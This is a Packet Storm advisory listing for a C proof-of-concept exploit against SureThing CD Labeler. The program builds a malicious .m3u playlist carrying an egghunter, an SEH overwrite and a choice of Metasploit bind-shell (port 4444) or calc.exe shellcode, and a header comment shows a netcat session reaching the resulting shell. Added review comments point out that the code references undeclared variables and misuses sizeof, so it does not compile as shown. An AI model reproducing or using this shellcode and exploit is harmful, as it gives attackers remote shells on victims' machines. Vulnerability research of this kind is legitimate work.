
SureThing CD Labeler Stack Overflow

🗓️ 09 Jun 2010 00:00:00 · Reported by mr_me · Type
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

SureThing CD Labeler stack overflow PoC exploit, found by Ruben Alejandro. This program creates a malicious .m3u file that triggers a stack overflow when it is imported into the SureThing CD Labeler application, enabling remote code execution.

Code
`/*  
surethingcdlabelerbofpoc.c  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SureThing cd labeler (m3u/pls) - unicode stack overflow PoC exploit  
Found by: Ruben Alejandro - chap0  
Author: Steven Seeley - mr_me (http://net-ninja.net/)  
Greetz to: Corelan Security Team  
http://www.corelan.be:8800/index.php/security/corelan-team-members/  
Writeup: Unicode, the magic of exploiting 0x00410041 (https://net-ninja.net/blog/?p=71)  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Script provided 'as is', without any warranty.  
Use for educational purposes only.  
Do not use this code to do anything illegal !  
  
Note : you are not allowed to edit/modify this code.  
If you do, Corelan cannot be held responsible for any damages this may cause.  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
usage:  
Compile this with lcc-win32 and execute it choosing your shellcode to create the .m3u file.  
Then click on 'playlists' --> 'Import Playlist from Hard Drive' -->  
'Import playlist from a file on my computer' --> for filetype select 'Generic m3u/pls file'  
--> open evil m3u file --> boom.  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
mrme@backtrack:~$ nc -v 192.168.2.5 4444  
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out  
(UNKNOWN) [192.168.2.5] 4444 (?) open  
Microsoft Windows XP [Version 5.1.2600]  
(C) Copyright 1985-2001 Microsoft Corp.  
  
C:\>  
*/  
  
#include <stdio.h>  
#include <string.h>  
#include <stdlib.h>  
  
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum  
http://metasploit.com */  
  
/* Payload option 1 (menu entry "Bindshell on port 4444" in main).
 * Metasploit-generated, PexAlphaNum-encoded, so nearly every byte after the
 * short decoder stub is a printable ASCII character. main() appends it with
 * sizeof(bind)-1 so the string's terminating NUL is not written to the file. */
unsigned char bind[] =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"  
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"  
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"  
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"  
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"  
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"  
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"  
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"  
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"  
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"  
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"  
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"  
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"  
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"  
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"  
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"  
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"  
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"  
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"  
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"  
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"  
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"  
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"  
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"  
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"  
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"  
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"  
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"  
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"  
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"  
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"  
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"  
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"  
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"  
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"  
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"  
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"  
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"  
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"  
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"  
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a";  
  
/* Payload option 2 (menu entry "Calc.exe" in main). Its origin and encoder
 * are not stated in this listing; after the first few bytes it is mostly
 * printable ASCII, which suggests an alphanumeric encoder — unconfirmed.
 * main() appends it with sizeof(calc)-1, dropping the terminating NUL. */
unsigned char calc[] =  
"\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"  
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"  
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"  
"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"  
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"  
"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"  
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"  
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"  
"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"  
"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"  
"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"  
"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"  
"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"  
"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"  
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"  
"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"  
"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"  
"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"  
"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"  
"\x50\x41\x41";  
  
// Unicode-encoded egghunter, stored as plain printable text rather than \x
// escapes, so the characters below are the exact bytes that reach the file.
// main() writes it right after the first 8 filler bytes, and later writes the
// 8-byte `tag` marker immediately before the chosen payload; the two are
// meant to pair up (marker search is the egghunter's job, per the file header).
unsigned char egghunter[] =  
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ"  
"1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY"  
"AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J"  
"O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA";  
  
// "Venetian" (unicode-friendly) stage: 23 bytes that main() writes directly
// after the SEH record. The name describes the author's intent (fix up EAX and
// jump); the listing itself does not show what address it targets.
unsigned char getAddressAndAlignEaxThenJmp[] =  
"\x58\x6d\x58\x6d\x58\x6d\x58\x6d\x05\x02\x22\x6d\x2d\x02\x11\x6d"  
"\x2d\x02\x11\x6d\x50\x6d\xc3";  
  
// 8-byte egghunter marker, "w00tw00t" in ASCII; written once by main() just
// before the selected payload (sizeof(tag)-1, so the NUL is not emitted).
unsigned char tag[] = "\x77\x30\x30\x74\x77\x30\x30\x74";  
  
/*
 * Program entry point.
 *
 * Creates cst-surethingcdlabeler.m3u in the current directory and fills it,
 * in order, with: 8 filler bytes, `egghunter`, 62 filler bytes, the nSEH/SEH
 * pair, `getAddressAndAlignEaxThenJmp`, 405 filler bytes, `tag`, and finally
 * the payload picked from a two-entry menu read with scanf.
 *
 * argc/argv are not used. Returns 0 after writing the file; on fopen failure
 * it prints a message and calls exit(0), which reports success to the shell
 * even though nothing was written.
 */
int main ( int argc , char * argv[])  
{  
FILE* expfle = NULL; // output stream; "wb" so bytes go out unaltered  
char* SEH = "\x72\x73"; // CALL DWORD PTR SS:[EBP-4] from dwwin.dll  
char* NSEH = "\x41\x6d"; int i; // i serves as loop counter and later as menu choice  
  
printf("\n***************************************************************************\n");  
printf("\tSureThing CD Labeler Unicode stack overflow PoC Exploit\n");  
printf("\tFound by: Ruben Alejandro - chap0\n");  
printf("\tCode by: Steven Seeley - mr_me\n");  
printf("\thttp://www.net-ninja.net/\n");  
printf("***************************************************************************\n");  
  
// Fixed output name; any existing file of that name is silently truncated.  
if( (expfle=fopen("cst-surethingcdlabeler.m3u","wb")) ==NULL )  
{  
perror("\n[-] Cannot create the exploit file..");  
exit(0); // exit status 0 on a failure path  
}  
  
// Filler is written one byte ('A') per fwrite call; return values are never checked  
// anywhere in this function, so a short write would go unnoticed.  
for (i=0; i<8; i++)  
{  
fwrite("\x41", 1, 1, expfle); // junk  
}  
  
fwrite(egghunter, sizeof(egghunter)-1, 1, expfle); // egghunter  
  
for (i=0; i<62; i++)  
{  
fwrite("\x41", 1, 1, expfle); // junk  
}  
  
// NOTE(review): `nseh` and `seh` are not declared in this listing — the locals  
// above are `NSEH` and `SEH` — so the file does not compile as published.  
// sizeof() applied to a char* also yields the pointer size, not the string length.  
fwrite(nseh, sizeof(nseh)-1, 1, expfle); // nseh - walk  
fwrite(seh, sizeof(seh)-1, 1, expfle); // seh - unicode friendly  
fwrite(getAddressAndAlignEaxThenJmp, // custom unicode shellcode  
sizeof(getAddressAndAlignEaxThenJmp)-1, 1, expfle);  
  
for (i=0; i<405; i++)  
{  
fwrite("\x41", 1, 1, expfle); // junk  
}  
  
fwrite(tag, sizeof(tag)-1, 1, expfle); // egghunter tag  
  
printf ("\n[+] Enter shellcode option: \n");  
printf ("\n\t1. Bindshell on port 4444");  
printf ("\n\t2. Calc.exe\n");  
// scanf's result is not checked: on non-numeric input i keeps its last loop  
// value (405), neither branch below matches, and the file ends without a payload.  
scanf ("%d",&i);  
  
if (i == 1){  
fwrite(bind, sizeof(bind)-1, 1, expfle); // bind  
}  
else if (i == 2){  
fwrite(calc, sizeof(calc)-1, 1, expfle); // calc  
}  
  
fclose(expfle); // return value ignored; the "created successfully" message is printed regardless  
printf("\n[+] cst-surethingcdlabeler.m3u created successfully! \r\n");  
  
return 0;  
  
}  
  
  
`
